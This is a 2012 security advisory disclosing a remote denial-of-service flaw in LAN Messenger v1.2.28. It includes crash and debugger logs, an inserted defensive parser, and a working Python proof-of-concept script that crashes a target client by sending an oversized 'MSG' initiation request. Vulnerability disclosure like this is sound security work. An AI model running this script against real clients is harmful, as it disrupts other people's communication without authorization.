Title:
======
LAN Messenger v1.2.28 - Denial of Service Vulnerability

Date:
=====
2012-05-01

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=537

VL-ID:
=====
537

Introduction:
=============
LAN Messenger is a free and open source cross-platform instant messaging application for communication over a local network.
It does not require a server. A number of useful features including event notifications, file transfer and message logging are provided.

(Copy of the Website: http://lanmsngr.sourceforge.net )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a remote Denial of Service vulnerability in LAN Messenger v1.2.28.

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A remote Denial of Service vulnerability was detected in LAN Messenger <= v1.2.28 (current version) for Windows.
The vulnerability is triggered by sending a malformed initiation request to the client.

The initiation consists of 3 parts: MSG + Number + UserID

As an example:

0000 4d 53 47 30 30 30 43 32 39 43 39 43 32 39 32 41 MSG000C29C9C292A
0010 64 6d 69 6e 69 73 74 72 61 74 6f 72 dministrator

When 8190 (tested on WinXP) or more bytes are appended to the "MSG" string, a C++ exception is triggered and the client aborts.
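The message format and crash threshold above, as an added example that is not part of the advisory or of LAN Messenger's own code: a defensive parser that rebuilds the request from the advisory's hex dump, drops any request at or above the 8190-byte threshold before it reaches the message handler, and splits the remainder into Number and UserID. It assumes, since the advisory does not say, that Number is the 12 hex digits seen in the sample dump and that the UserID follows it directly.

```python
import re

# Requests at or above this size are the ones the advisory reports as crashing
# the client (8190 bytes appended to "MSG", tested on WinXP), so a hardened
# receiver drops them before they reach the message handler.
MAX_INIT_LEN = 8190

# Assumption, not stated in the advisory: "Number" is the 12-hex-digit value
# seen in the sample dump (000C29C9C292) and the UserID follows it directly,
# limited here to 64 printable bytes.
INIT_RE = re.compile(rb"^MSG([0-9A-Fa-f]{12})([^\x00-\x1f]{1,64})$")


def decode_hexdump(dump):
    """Rebuild raw bytes from 'offset  hex bytes  ascii' lines as printed in the advisory."""
    out = bytearray()
    for line in dump.strip().splitlines():
        hex_tokens = []
        for tok in line.split()[1:]:          # skip the offset column
            if len(hex_tokens) == 16 or not re.fullmatch(r"[0-9a-fA-F]{2}", tok):
                break                         # ASCII column reached
            hex_tokens.append(tok)
        out.extend(int(t, 16) for t in hex_tokens)
    return bytes(out)


def parse_initiation(msg):
    """Return (number, user_id) for a well-formed request, or None if it must be dropped."""
    if len(msg) >= MAX_INIT_LEN or not msg.startswith(b"MSG"):
        return None
    m = INIT_RE.match(msg)
    if m is None:
        return None
    return m.group(1).decode("ascii"), m.group(2).decode("ascii", "replace")


# Sample taken from the advisory's Details section.
SAMPLE_DUMP = """
0000 4d 53 47 30 30 30 43 32 39 43 39 43 32 39 32 41 MSG000C29C9C292A
0010 64 6d 69 6e 69 73 74 72 61 74 6f 72 dministrator
"""

# Constructed oversized request, shaped like the PoC payload ("MSG" + 8190 x 'A').
OVERSIZED = b"MSG" + b"A" * 8190

if __name__ == "__main__":
    print(parse_initiation(decode_hexdump(SAMPLE_DUMP)))  # ('000C29C9C292', 'Administrator')
    print(parse_initiation(OVERSIZED))                     # None
```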
Windows-Crash-Log:

Problemsignatur:
Problemereignisname: APPCRASH
Anwendungsname: lmc.exe
Anwendungsversion: 1.2.2.8
Anwendungszeitstempel: 4f769831
Fehlermodulname: QtCore4.dll
Fehlermodulversion: 4.8.0.0
Fehlermodulzeitstempel: 4ee593bc
Ausnahmecode: 40000015
Ausnahmeoffset: 0018c779
Betriebsystemversion: 6.1.7601.2.1.0.274.10
Gebietsschema-ID: 1031
Zusatzinformation 1: c210
Zusatzinformation 2: c210baa76e54b5e894c7f7a96bc23eb7
Zusatzinformation 3: e02f
Zusatzinformation 4: e02f83123de2633d9cdeb87470e7443f

Application Crash-Log:

[2012.04.28 20:49:12] New connection received
[2012.04.28 20:49:12] Accepted connection from user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[2012.04.28 20:49:12] Sending public key to user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[2012.04.28 20:49:12] Connection to user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA lost

Debug-Log:
(a64.6ec): Break instruction exception - code 80000003 (first chance)
eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
eip=7c91120e esp=03f6ffcc ebp=03f6fff4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
7c91120e cc              int     3
0:004> g
(a64.e8c): C++ EH exception - code e06d7363 (first chance)
eax=6fbc1350 ebx=00000000 ecx=003f2430 edx=003f2430 esi=7c91de6e edi=00000003
eip=7c91e514 esp=0022d004 ebp=0022d100 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!KiFastSystemCallRet:
7c91e514 c3              ret

Stack-Trace:

ChildEBP RetAddr
0022d000 7c91de7a ntdll!KiFastSystemCallRet
0022d004 7c81cace ntdll!ZwTerminateProcess+0xc
0022d100 7c81cb26 kernel32!_ExitProcess+0x62
0022d114 77c09d45 kernel32!ExitProcess+0x14
0022d120 77c09e78 msvcrt!__crtExitProcess+0x32
0022d130 77c09eac msvcrt!_cinit+0xee
0022d144 77c0523b msvcrt!_exit+0x12
0022d18c 77c06bc1 msvcrt!raise+0xae
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Programme/LAN Messenger/QtCore4.dll -
0022d1e8 6a32d615 msvcrt!abort+0xe
WARNING: Stack unwind information not available. Following frames may be wrong.
0022d208 6a34f667 QtCore4!ZN10QTextCodec12codecForNameEPKc+0x71
0022d228 6a350ee2 QtCore4!ZNK7QPointF7toPointEv+0x33b
0022d248 6a2c9ccb QtCore4!ZeqRK6QRectFS1_+0x17aa
0022d298 6a2f0a85 QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0x7b
0022d318 7e368734 QtCore4!ZN21QEventDispatcherWin3221registerEventNotifierEP17QWinEventNotifier+0x349
0022d354 7e368816 USER32!InternalCallWinProc+0x28
0022d3bc 7e3689cd USER32!UserCallWinProcCheckWow+0x150
0022d41c 7e368a10 USER32!DispatchMessageWorker+0x306
0022d42c 7e377721 USER32!DispatchMessageW+0xf
0022d464 7e3749c4 USER32!DialogBox2+0x15a
0022d48c 7e38a956 USER32!InternalDialogBox+0xd0
0022d74c 7e38a2bc USER32!SoftModalMessageBox+0x938
0022d89c 7e3b63fd USER32!MessageBoxWorker+0x2ba
0022d8f4 7e3b64a2 USER32!MessageBoxTimeoutW+0x7a
0022d928 7e3a0877 USER32!MessageBoxTimeoutA+0x9c
0022d948 7e3a082f USER32!MessageBoxExA+0x1b
0022d964 77c09300 USER32!MessageBoxA+0x45
0022d998 77c0b127 msvcrt!__crtMessageBoxA+0xf6
0022dba0 77c06bba msvcrt!_NMSG_WRITE+0x19e
0022dbf8 6a32d615 msvcrt!abort+0x7
0022dc18 6a34f667 QtCore4!ZN10QTextCodec12codecForNameEPKc+0x71
0022dc38 6a350ee2 QtCore4!ZNK7QPointF7toPointEv+0x33b
0022dc58 6a2c9ccb QtCore4!ZeqRK6QRectFS1_+0x17aa
0022dca8 6a2f0a85 QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0x7b
0022dd28 7e368734 QtCore4!ZN21QEventDispatcherWin3221registerEventNotifierEP17QWinEventNotifier+0x349
0022dd60 7e368816 USER32!InternalCallWinProc+0x28
0022ddc8 7e3689cd USER32!UserCallWinProcCheckWow+0x150
0022de28 7e368a10 USER32!DispatchMessageWorker+0x306
0022de38 6a2f3505 USER32!DispatchMessageW+0xf
*** ERROR: Symbol file could not be found.
Defaulted to export symbols for C:/Programme/LAN Messenger/QtGui4.dll -
0022fc48 6517445c QtCore4!ZN21QEventDispatcherWin3213processEventsE6QFlagsIN10QEventLoop17ProcessEventsFlagEE+0x575
0022fcb8 6a2c898e QtGui4!ZN19QApplicationPrivate14enterModal_sysEP7QWidget+0x464
0022fce8 6a2c8d93 QtCore4!ZN10QEventLoop13processEventsE6QFlagsINS_17ProcessEventsFlagEE+0x36
0022fd38 6a2cd50f QtCore4!ZN10QEventLoop4execE6QFlagsINS_17ProcessEventsFlagEE+0x143
*** ERROR: Module load completed but symbols could not be loaded for C:/Programme/LAN Messenger/lmc.exe
0022fd78 0044f1c0 QtCore4!ZN16QCoreApplication4execEv+0x8b
0022feb8 004cf005 lmc+0x4f1c0
0022fef8 004cecc8 lmc+0xcf005
0022ff78 0040124b lmc+0xcecc8
0022ffb0 004012b8 lmc+0x124b
0022ffc0 7c817077 lmc+0x12b8
0022fff0 00000000 kernel32!BaseProcessStart+0x23

Proof of Concept:
=================
The denial of service vulnerability can be exploited by remote attackers.
For demonstration or reproduction ...

#!/usr/bin/python
# LAN Messenger <= v1.2.28 remote DoS PoC (Python 2)
from struct import pack
import socket,sys
import os

target="192.168.0.1"
port=50000

# 8190 bytes of 'A' (\x41) are appended to the "MSG" initiation prefix
junk = "\x41" * 8190

print "[*] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[*] Connected to " + target + "!"
except:
    print "[!] " + target + " didn't respond\n"
    sys.exit(0)

print "[*] Sending malformed request..."
# "\x4d\x53\x47" is the ASCII string "MSG"
s.send("\x4d\x53\x47" + junk)
print "[!] Exploit has been sent!\n"
s.close()

Risk:
=====
The security risk of the remote denial of service vulnerability is estimated as medium.

Credits:
========
Vulnerability Laboratory [Research Team] - Julien Ahrens (MrTuxracer) [www.inshell.net]

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of
such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the
foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires
authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted.
All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012 Vulnerability-Lab

--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com